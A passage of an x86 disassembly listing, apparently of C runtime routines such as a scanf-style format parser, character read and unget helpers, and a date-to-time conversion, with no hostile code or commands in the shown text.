cmp esi, 64h
jz loc_41AF37
jle loc_41ACAF
cmp esi, 67h
jle short loc_41AA82
cmp esi, 69h
jz short loc_41AA6A
cmp esi, 6Eh
jnz loc_41ACAF
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_41B165
jmp loc_41B18B
; ---------------------------------------------------------------------------
loc_41AA6A: ; CODE XREF: sub_41A824+229�j
push 64h
pop esi
loc_41AA6D: ; CODE XREF: sub_41A824+480�j
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz loc_41ACF7
mov [ebp+var_17], 1
jmp loc_41ACFC
; ---------------------------------------------------------------------------
loc_41AA82: ; CODE XREF: sub_41A824+224�j
mov ebx, [ebp+var_14]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_41AA9E
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_41AAA3
; ---------------------------------------------------------------------------
loc_41AA9E: ; CODE XREF: sub_41A824+26A�j
cmp ebx, 2Bh
jnz short loc_41AABA
loc_41AAA3: ; CODE XREF: sub_41A824+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_41B280
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41AABD
; ---------------------------------------------------------------------------
loc_41AABA: ; CODE XREF: sub_41A824+27D�j
mov edi, [ebp+arg_0]
loc_41AABD: ; CODE XREF: sub_41A824+294�j
cmp [ebp+var_20], 0
jz short loc_41AACC
cmp [ebp+var_C], 15Dh
jle short loc_41AAD3
loc_41AACC: ; CODE XREF: sub_41A824+29D�j
mov [ebp+var_C], 15Dh
loc_41AAD3: ; CODE XREF: sub_41A824+2A6�j
; sub_41A824+2F2�j
cmp dword_43B7AC, 1
jle short loc_41AAE8
push 4
push ebx
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41AAF3
; ---------------------------------------------------------------------------
loc_41AAE8: ; CODE XREF: sub_41A824+2B6�j
mov eax, off_43B5A0
mov al, [eax+ebx*2]
and eax, 4
loc_41AAF3: ; CODE XREF: sub_41A824+2C2�j
test eax, eax
jz short loc_41AB18
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41AB18
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41B280
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41AAD3
; ---------------------------------------------------------------------------
loc_41AB18: ; CODE XREF: sub_41A824+2D1�j
; sub_41A824+2DB�j
cmp byte_43B7B0, bl
jnz short loc_41AB86
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41AB86
inc [ebp+var_4]
push edi
call sub_41B280
mov ebx, eax
mov al, byte_43B7B0
mov [esi], al
pop ecx
mov [ebp+var_14], ebx
inc esi
loc_41AB41: ; CODE XREF: sub_41A824+360�j
cmp dword_43B7AC, 1
jle short loc_41AB56
push 4
push ebx
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41AB61
; ---------------------------------------------------------------------------
loc_41AB56: ; CODE XREF: sub_41A824+324�j
mov eax, off_43B5A0
mov al, [eax+ebx*2]
and eax, 4
loc_41AB61: ; CODE XREF: sub_41A824+330�j
test eax, eax
jz short loc_41AB86
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41AB86
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_41B280
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41AB41
; ---------------------------------------------------------------------------
loc_41AB86: ; CODE XREF: sub_41A824+2FA�j
; sub_41A824+304�j ...
cmp [ebp+var_1C], 0
jz loc_41AC1E
cmp ebx, 65h
jz short loc_41AB9E
cmp ebx, 45h
jnz loc_41AC1E
loc_41AB9E: ; CODE XREF: sub_41A824+36F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41AC1E
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_41B280
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov [ebp+var_14], ebx
jnz short loc_41ABC5
mov [esi], al
inc esi
jmp short loc_41ABCA
; ---------------------------------------------------------------------------
loc_41ABC5: ; CODE XREF: sub_41A824+39A�j
cmp ebx, 2Bh
jnz short loc_41ABE8
loc_41ABCA: ; CODE XREF: sub_41A824+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_41ABD9
and [ebp+var_C], eax
jmp short loc_41ABE8
; ---------------------------------------------------------------------------
loc_41ABD9: ; CODE XREF: sub_41A824+3AE�j
; sub_41A824+3F8�j
inc [ebp+var_4]
push edi
call sub_41B280
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41ABE8: ; CODE XREF: sub_41A824+3A4�j
; sub_41A824+3B3�j
cmp dword_43B7AC, 1
jle short loc_41ABFD
push 4
push ebx
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41AC08
; ---------------------------------------------------------------------------
loc_41ABFD: ; CODE XREF: sub_41A824+3CB�j
mov eax, off_43B5A0
mov al, [eax+ebx*2]
and eax, 4
loc_41AC08: ; CODE XREF: sub_41A824+3D7�j
test eax, eax
jz short loc_41AC1E
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_41AC1E
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_41ABD9
; ---------------------------------------------------------------------------
loc_41AC1E: ; CODE XREF: sub_41A824+366�j
; sub_41A824+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_41B29A
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_41B22A
cmp [ebp+var_E], 0
jnz loc_41B18B
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call off_43B8D0
add esp, 0Ch
jmp loc_41B18B
; ---------------------------------------------------------------------------
loc_41AC62: ; CODE XREF: sub_41A824+20C�j
cmp [ebp+var_20], eax
jnz short loc_41AC71
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_41AC71: ; CODE XREF: sub_41A824+441�j
cmp [ebp+var_5], 0
jle short loc_41AC7B
mov [ebp+var_16], 1
loc_41AC7B: ; CODE XREF: sub_41A824+451�j
mov edi, offset dword_43B7C8
jmp loc_41AD90
; ---------------------------------------------------------------------------
loc_41AC85: ; CODE XREF: sub_41A824+1FD�j
mov eax, esi
sub eax, 70h
jz loc_41AF33
sub eax, 3
jz loc_41AD81
dec eax
dec eax
jz loc_41AF37
sub eax, 3
jz loc_41AA6D
sub eax, 3
jz short loc_41ACD3
loc_41ACAF: ; CODE XREF: sub_41A824+21B�j
; sub_41A824+22E�j
movzx eax, byte ptr [ebx]
cmp eax, [ebp+var_14]
jnz loc_41B1FA
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_41B18B
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_41B18B
; ---------------------------------------------------------------------------
loc_41ACD3: ; CODE XREF: sub_41A824+489�j
cmp [ebp+var_5], 0
jle short loc_41ACDD
mov [ebp+var_16], 1
loc_41ACDD: ; CODE XREF: sub_41A824+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_41AD94
mov eax, edi
lea edi, [eax+1]
jmp loc_41AD90
; ---------------------------------------------------------------------------
loc_41ACF7: ; CODE XREF: sub_41A824+24F�j
cmp ebx, 2Bh
jnz short loc_41AD1E
loc_41ACFC: ; CODE XREF: sub_41A824+259�j
dec [ebp+var_C]
jnz short loc_41AD0D
cmp [ebp+var_20], 0
jz short loc_41AD0D
mov [ebp+var_F], 1
jmp short loc_41AD1E
; ---------------------------------------------------------------------------
loc_41AD0D: ; CODE XREF: sub_41A824+4DB�j
; sub_41A824+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41B280
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41AD1E: ; CODE XREF: sub_41A824+4D6�j
; sub_41A824+4E7�j
cmp ebx, 30h
jnz loc_41AF6C
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41B280
mov ebx, eax
pop ecx
cmp bl, 78h
mov [ebp+var_14], ebx
jz short loc_41AD6C
cmp bl, 58h
jz short loc_41AD6C
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_41AD56
push 6Fh
loc_41AD50: ; CODE XREF: sub_41A824+55B�j
pop esi
jmp loc_41AF6C
; ---------------------------------------------------------------------------
loc_41AD56: ; CODE XREF: sub_41A824+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41B29A
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_41AF69
; ---------------------------------------------------------------------------
loc_41AD6C: ; CODE XREF: sub_41A824+517�j
; sub_41A824+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41B280
pop ecx
mov ebx, eax
mov [ebp+var_14], ebx
push 78h
jmp short loc_41AD50
; ---------------------------------------------------------------------------
loc_41AD81: ; CODE XREF: sub_41A824+46F�j
cmp [ebp+var_5], 0
jle short loc_41AD8B
mov [ebp+var_16], 1
loc_41AD8B: ; CODE XREF: sub_41A824+561�j
mov edi, offset dword_43B7C0
loc_41AD90: ; CODE XREF: sub_41A824+45C�j
; sub_41A824+4CE�j
or [ebp+var_18], 0FFh
loc_41AD94: ; CODE XREF: sub_41A824+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_417430
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_41ADB8
cmp byte ptr [edi], 5Dh
jnz short loc_41ADB8
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_41ADBB
; ---------------------------------------------------------------------------
loc_41ADB8: ; CODE XREF: sub_41A824+584�j
; sub_41A824+589�j
mov dl, [ebp+var_35]
loc_41ADBB: ; CODE XREF: sub_41A824+592�j
; sub_41A824+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_41AE20
inc edi
cmp al, 2Dh
jnz short loc_41AE07
test dl, dl
jz short loc_41AE07
mov cl, [edi]
cmp cl, 5Dh
jz short loc_41AE07
inc edi
cmp dl, cl
jnb short loc_41ADDA
mov al, cl
jmp short loc_41ADDE
; ---------------------------------------------------------------------------
loc_41ADDA: ; CODE XREF: sub_41A824+5B0�j
mov al, dl
mov dl, cl
loc_41ADDE: ; CODE XREF: sub_41A824+5B4�j
cmp dl, al
ja short loc_41AE03
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_41ADEB: ; CODE XREF: sub_41A824+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_41ADEB
loc_41AE03: ; CODE XREF: sub_41A824+5BC�j
xor dl, dl
jmp short loc_41ADBB
; ---------------------------------------------------------------------------
loc_41AE07: ; CODE XREF: sub_41A824+5A0�j
; sub_41A824+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_41ADBB
; ---------------------------------------------------------------------------
loc_41AE20: ; CODE XREF: sub_41A824+59B�j
cmp byte ptr [edi], 0
jz loc_41B22A
cmp [ebp+var_3C], 7Bh
jnz short loc_41AE32
mov [ebp+arg_4], edi
loc_41AE32: ; CODE XREF: sub_41A824+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push [ebp+var_14]
mov [ebp+var_30], esi
call sub_41B29A
pop ecx
pop ecx
loc_41AE49: ; CODE XREF: sub_41A824+6BC�j
; sub_41A824+6C4�j
cmp [ebp+var_20], 0
jz short loc_41AE5D
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_41AEF9
loc_41AE5D: ; CODE XREF: sub_41A824+629�j
inc [ebp+var_4]
push edi
call sub_41B280
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jz short loc_41AEED
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_41AEED
cmp [ebp+var_E], 0
jnz short loc_41AEE5
cmp [ebp+var_16], 0
jz short loc_41AEDA
mov ecx, off_43B5A0
mov [ebp+var_38], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41AEB9
inc [ebp+var_4]
push edi
call sub_41B280
pop ecx
mov [ebp+var_37], al
loc_41AEB9: ; CODE XREF: sub_41A824+686�j
push dword_43B7AC
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3E]
push eax
call sub_41DB75
mov ax, [ebp+var_3E]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_41AEDD
; ---------------------------------------------------------------------------
loc_41AEDA: ; CODE XREF: sub_41A824+673�j
mov [esi], al
inc esi
loc_41AEDD: ; CODE XREF: sub_41A824+6B4�j
mov [ebp+var_2C], esi
jmp loc_41AE49
; ---------------------------------------------------------------------------
loc_41AEE5: ; CODE XREF: sub_41A824+66D�j
inc [ebp+var_30]
jmp loc_41AE49
; ---------------------------------------------------------------------------
loc_41AEED: ; CODE XREF: sub_41A824+649�j
; sub_41A824+667�j
dec [ebp+var_4]
push edi
push eax
call sub_41B29A
pop ecx
pop ecx
loc_41AEF9: ; CODE XREF: sub_41A824+633�j
cmp [ebp+var_30], esi
jz loc_41B22A
cmp [ebp+var_E], 0
jnz loc_41B18B
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_41B18B
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_41AF2B
and word ptr [eax], 0
jmp loc_41B18B
; ---------------------------------------------------------------------------
loc_41AF2B: ; CODE XREF: sub_41A824+6FC�j
and byte ptr [eax], 0
jmp loc_41B18B
; ---------------------------------------------------------------------------
loc_41AF33: ; CODE XREF: sub_41A824+466�j
mov [ebp+var_D], 1
loc_41AF37: ; CODE XREF: sub_41A824+203�j
; sub_41A824+215�j ...
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz short loc_41AF45
mov [ebp+var_17], 1
jmp short loc_41AF4A
; ---------------------------------------------------------------------------
loc_41AF45: ; CODE XREF: sub_41A824+719�j
cmp ebx, 2Bh
jnz short loc_41AF6C
loc_41AF4A: ; CODE XREF: sub_41A824+71F�j
dec [ebp+var_C]
jnz short loc_41AF5B
cmp [ebp+var_20], 0
jz short loc_41AF5B
mov [ebp+var_F], 1
jmp short loc_41AF6C
; ---------------------------------------------------------------------------
loc_41AF5B: ; CODE XREF: sub_41A824+729�j
; sub_41A824+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41B280
pop ecx
mov ebx, eax
loc_41AF69: ; CODE XREF: sub_41A824+543�j
mov [ebp+var_14], ebx
loc_41AF6C: ; CODE XREF: sub_41A824+4FD�j
; sub_41A824+52D�j ...
cmp [ebp+var_30], 0
jz loc_41B085
cmp [ebp+var_F], 0
jnz loc_41B063
loc_41AF80: ; CODE XREF: sub_41A824+82C�j
cmp esi, 78h
jnz short loc_41AFD4
cmp dword_43B7AC, 1
jle short loc_41AF9D
push 80h
push ebx
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41AFAA
; ---------------------------------------------------------------------------
loc_41AF9D: ; CODE XREF: sub_41A824+768�j
mov eax, off_43B5A0
mov al, [eax+ebx*2]
and eax, 80h
loc_41AFAA: ; CODE XREF: sub_41A824+777�j
test eax, eax
jz loc_41B055
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_41DC70
push ebx
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_41B249
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_41B027
; ---------------------------------------------------------------------------
loc_41AFD4: ; CODE XREF: sub_41A824+75F�j
cmp dword_43B7AC, 1
jle short loc_41AFE9
push 4
push ebx
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41AFF4
; ---------------------------------------------------------------------------
loc_41AFE9: ; CODE XREF: sub_41A824+7B7�j
mov eax, off_43B5A0
mov al, [eax+ebx*2]
and eax, 4
loc_41AFF4: ; CODE XREF: sub_41A824+7C3�j
test eax, eax
jz short loc_41B055
cmp esi, 6Fh
jnz short loc_41B012
cmp ebx, 38h
jge short loc_41B055
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_41DC70
jmp short loc_41B021
; ---------------------------------------------------------------------------
loc_41B012: ; CODE XREF: sub_41A824+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_417860
loc_41B021: ; CODE XREF: sub_41A824+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_41B027: ; CODE XREF: sub_41A824+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_41B03F
dec [ebp+var_C]
jz short loc_41B063
loc_41B03F: ; CODE XREF: sub_41A824+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41B280
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_41AF80
; ---------------------------------------------------------------------------
loc_41B055: ; CODE XREF: sub_41A824+788�j
; sub_41A824+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41B29A
pop ecx
pop ecx
loc_41B063: ; CODE XREF: sub_41A824+756�j
; sub_41A824+819�j
cmp [ebp+var_17], 0
jz loc_41B149
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_41B149
; ---------------------------------------------------------------------------
loc_41B085: ; CODE XREF: sub_41A824+74C�j
cmp [ebp+var_F], 0
jnz loc_41B141
loc_41B08F: ; CODE XREF: sub_41A824+90A�j
cmp esi, 78h
jz short loc_41B0D3
cmp esi, 70h
jz short loc_41B0D3
cmp dword_43B7AC, 1
jle short loc_41B0AE
push 4
push ebx
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41B0B9
; ---------------------------------------------------------------------------
loc_41B0AE: ; CODE XREF: sub_41A824+87C�j
mov eax, off_43B5A0
mov al, [eax+ebx*2]
and eax, 4
loc_41B0B9: ; CODE XREF: sub_41A824+888�j
test eax, eax
jz short loc_41B133
cmp esi, 6Fh
jnz short loc_41B0CC
cmp ebx, 38h
jge short loc_41B133
shl edi, 3
jmp short loc_41B10B
; ---------------------------------------------------------------------------
loc_41B0CC: ; CODE XREF: sub_41A824+89C�j
lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_41B10B
; ---------------------------------------------------------------------------
loc_41B0D3: ; CODE XREF: sub_41A824+86E�j
; sub_41A824+873�j
cmp dword_43B7AC, 1
jle short loc_41B0EB
push 80h
push ebx
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41B0F8
; ---------------------------------------------------------------------------
loc_41B0EB: ; CODE XREF: sub_41A824+8B6�j
mov eax, off_43B5A0
mov al, [eax+ebx*2]
and eax, 80h
loc_41B0F8: ; CODE XREF: sub_41A824+8C5�j
test eax, eax
jz short loc_41B133
push ebx
shl edi, 4
call sub_41B249
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_41B10B: ; CODE XREF: sub_41A824+8A6�j
; sub_41A824+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_41B11D
dec [ebp+var_C]
jz short loc_41B141
loc_41B11D: ; CODE XREF: sub_41A824+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41B280
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_41B08F
; ---------------------------------------------------------------------------
loc_41B133: ; CODE XREF: sub_41A824+897�j
; sub_41A824+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_41B29A
pop ecx
pop ecx
loc_41B141: ; CODE XREF: sub_41A824+865�j
; sub_41A824+8F7�j
cmp [ebp+var_17], 0
jz short loc_41B149
neg edi
loc_41B149: ; CODE XREF: sub_41A824+843�j
; sub_41A824+85C�j ...
cmp esi, 46h
jnz short loc_41B152
and [ebp+var_1C], 0
loc_41B152: ; CODE XREF: sub_41A824+928�j
cmp [ebp+var_1C], 0
jz loc_41B22A
cmp [ebp+var_E], 0
jnz short loc_41B18B
inc [ebp+var_34]
loc_41B165: ; CODE XREF: sub_41A824+23B�j
cmp [ebp+var_30], 0
jz short loc_41B17B
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_41B18B
; ---------------------------------------------------------------------------
loc_41B17B: ; CODE XREF: sub_41A824+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_41B188
mov [eax], edi
jmp short loc_41B18B
; ---------------------------------------------------------------------------
loc_41B188: ; CODE XREF: sub_41A824+95E�j
mov [eax], di
loc_41B18B: ; CODE XREF: sub_41A824+241�j
; sub_41A824+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_41B1D8
; ---------------------------------------------------------------------------
loc_41B196: ; CODE XREF: sub_41A824+93�j
inc [ebp+var_4]
push edi
call sub_41B280
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov [ebp+var_14], ebx
mov [ebp+arg_4], esi
jnz short loc_41B205
mov ecx, off_43B5A0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41B1D8
inc [ebp+var_4]
push edi
call sub_41B280
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_41B213
dec [ebp+var_4]
loc_41B1D8: ; CODE XREF: sub_41A824+970�j
; sub_41A824+99A�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41B1EE
cmp byte ptr [esi], 25h
jnz short loc_41B230
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_41B230
mov esi, eax
loc_41B1EE: ; CODE XREF: sub_41A824+9B8�j
mov al, [esi]
test al, al
jnz loc_41A84E
jmp short loc_41B22A
; ---------------------------------------------------------------------------
loc_41B1FA: ; CODE XREF: sub_41A824+1F4�j
; sub_41A824+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push [ebp+var_14]
jmp short loc_41B20A
; ---------------------------------------------------------------------------
loc_41B205: ; CODE XREF: sub_41A824+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_41B20A: ; CODE XREF: sub_41A824+9DF�j
call sub_41B29A
pop ecx
pop ecx
jmp short loc_41B22A
; ---------------------------------------------------------------------------
loc_41B213: ; CODE XREF: sub_41A824+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_41B29A
dec [ebp+var_4]
push edi
push ebx
call sub_41B29A
add esp, 10h
loc_41B22A: ; CODE XREF: sub_41A824+1F�j
; sub_41A824+40A�j ...
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41B241
loc_41B230: ; CODE XREF: sub_41A824+9BD�j
; sub_41A824+9C6�j
mov eax, [ebp+var_34]
test eax, eax
jnz short loc_41B244
cmp [ebp+var_15], al
jnz short loc_41B244
or eax, 0FFFFFFFFh
jmp short loc_41B244
; ---------------------------------------------------------------------------
loc_41B241: ; CODE XREF: sub_41A824+A0A�j
mov eax, [ebp+var_34]
loc_41B244: ; CODE XREF: sub_41A824+A11�j
; sub_41A824+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41A824 endp
; =============== S U B R O U T I N E =======================================
sub_41B249 proc near ; CODE XREF: sub_41A824+7A3�p
; sub_41A824+8DC�p
arg_0 = dword ptr 4
cmp dword_43B7AC, 1
push esi
jle short loc_41B263
mov esi, [esp+4+arg_0]
push 4
push esi
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41B272
; ---------------------------------------------------------------------------
loc_41B263: ; CODE XREF: sub_41B249+8�j
mov esi, [esp+4+arg_0]
mov eax, off_43B5A0
mov al, [eax+esi*2]
and eax, 4
loc_41B272: ; CODE XREF: sub_41B249+18�j
test eax, eax
jnz short loc_41B27C
and esi, 0FFFFFFDFh
sub esi, 7
loc_41B27C: ; CODE XREF: sub_41B249+2B�j
mov eax, esi
pop esi
retn
sub_41B249 endp
; =============== S U B R O U T I N E =======================================
sub_41B280 proc near ; CODE XREF: sub_41A824+1E1�p
; sub_41A824+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_41B292
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_41B292: ; CODE XREF: sub_41B280+7�j
push edx
call sub_41B582
pop ecx
retn
sub_41B280 endp
; =============== S U B R O U T I N E =======================================
sub_41B29A proc near ; CODE XREF: sub_41A824+6B�p
; sub_41A824+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_41B2B0
push [esp+arg_4]
push [esp+4+arg_0]
call sub_41DC8F
pop ecx
pop ecx
locret_41B2B0: ; CODE XREF: sub_41B29A+5�j
retn
sub_41B29A endp
; =============== S U B R O U T I N E =======================================
sub_41B2B1 proc near ; CODE XREF: sub_41A824+63�p
; sub_41A824+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_41B2B7: ; CODE XREF: sub_41B2B1+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_41B280
mov edi, eax
push edi
call sub_41DC3D
pop ecx
test eax, eax
pop ecx
jnz short loc_41B2B7
mov eax, edi
pop edi
pop esi
retn
sub_41B2B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B2D5 proc near ; CODE XREF: sub_418000+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_41B391
cmp ebx, 8Ah
jg loc_41B391
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, dword_43BEE4[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_41B314
cmp edi, 2
jle short loc_41B314
inc esi
loc_41B314: ; CODE XREF: sub_41B2D5+37�j
; sub_41B2D5+3C�j
call sub_41DCFD
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, dword_43BE00
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_41B387
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_41B38D
cmp dword_43BE04, 0
jz short loc_41B38D
lea eax, [ebp+var_24]
push eax
call sub_41DF70
pop ecx
mov ecx, [ebp+arg_0]
test eax, eax
jz short loc_41B38D
loc_41B387: ; CODE XREF: sub_41B2D5+90�j
add ecx, dword_43BE08
loc_41B38D: ; CODE XREF: sub_41B2D5+96�j
; sub_41B2D5+9F�j ...
mov eax, ecx
jmp short loc_41B394
; ---------------------------------------------------------------------------
loc_41B391: ; CODE XREF: sub_41B2D5+13�j
; sub_41B2D5+1F�j
or eax, 0FFFFFFFFh
loc_41B394: ; CODE XREF: sub_41B2D5+BA�j
pop ebx
leave
retn
sub_41B2D5 endp
; =============== S U B R O U T I N E =======================================
sub_41B397 proc near ; CODE XREF: sub_4180DC+2A�p
; sub_41E476+290�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, dword_516C80
jnb loc_41B431
mov eax, edi
mov esi, edi
sar eax, 5
and esi, 1Fh
lea ebx, ds:516B80h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_41B431
push edi
call sub_41E3E2
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41B410
cmp edi, 1
jz short loc_41B3DE
cmp edi, 2
jnz short loc_41B3F4
loc_41B3DE: ; CODE XREF: sub_41B397+40�j
push 2
call sub_41E3E2
push 1
mov ebp, eax
call sub_41E3E2
pop ecx
cmp eax, ebp
pop ecx
jz short loc_41B410
loc_41B3F4: ; CODE XREF: sub_41B397+45�j
push edi
call sub_41E3E2
pop ecx
push eax
nop
call near ptr 7C809B47h
test eax, eax
jnz short loc_41B410
nop
call near ptr 7C910331h
mov ebp, eax
jmp short loc_41B412
; ---------------------------------------------------------------------------
loc_41B410: ; CODE XREF: sub_41B397+3B�j
; sub_41B397+5B�j ...
xor ebp, ebp
